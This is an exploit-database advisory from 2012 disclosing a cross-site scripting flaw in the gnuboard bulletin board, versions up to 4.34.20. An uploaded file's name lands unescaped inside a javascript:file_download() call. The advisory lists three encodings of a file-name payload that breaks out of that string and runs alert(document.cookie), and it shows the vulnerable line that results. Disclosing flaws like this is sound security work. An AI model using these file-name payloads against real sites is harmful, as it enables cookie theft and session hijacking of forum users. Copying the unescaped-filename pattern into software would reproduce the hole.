gnuboard <= 4.34.20 XSS vulnerability via arbitrary file name



EKU-ID: 1703 CVE: OSVDB-ID:
Author: wh1ant Published: 2012-03-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: gnuboard <= 4.34.20 XSS vulnerability via arbitrary file name
# Date: 2012-03-12
# Author: wh1ant
# Software Link: http://sir.co.kr/bbs/board.php?bo_table=g4_pds&wr_id=7108
# Version: gnuboard <= 4.34.20
# Tested on: windows 7 Ultimate K
# Company: trinitysoft
# Group: secuholic

1) Vulnerability Description

gnuboard is a widely used open source bulletin board in Korea
gnuboard is affected by XSS vulnerability which allow an attacker to send a malicious script to an unsuspecting user.

1) you can upload a file (e.g. a.txt) to the BBS.
2) you can download it from the following scripts and figure out what's working on.

   ### vulnerable code #########################################################################################################################
   javascript:file_download('./download.php?bo_table=test&wr_id=13&no=0&sca=&sfl=&stx=&sst=&sod=&spt=0&page=0', 'a.txt');
   #############################################################################################################################################

3) you can also upload a file with name of XSS code. The following is the example.

   - ');alert(document.cookie);//
   - %27);alert(document.cookie);%2f%2f
   - %27%29%3b%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%2f%2f

   ### vulnerable code #########################################################################################################################
   javascript:file_download('./download.php?bo_table=test&wr_id=13&no=0&sca=&sfl=&stx=&sst=&sod=&spt=0&page=0', '');alert(document.cookie);//');
   #############################################################################################################################################

4) The example file works by pulling in the Javascript and running it as part of the Javascript.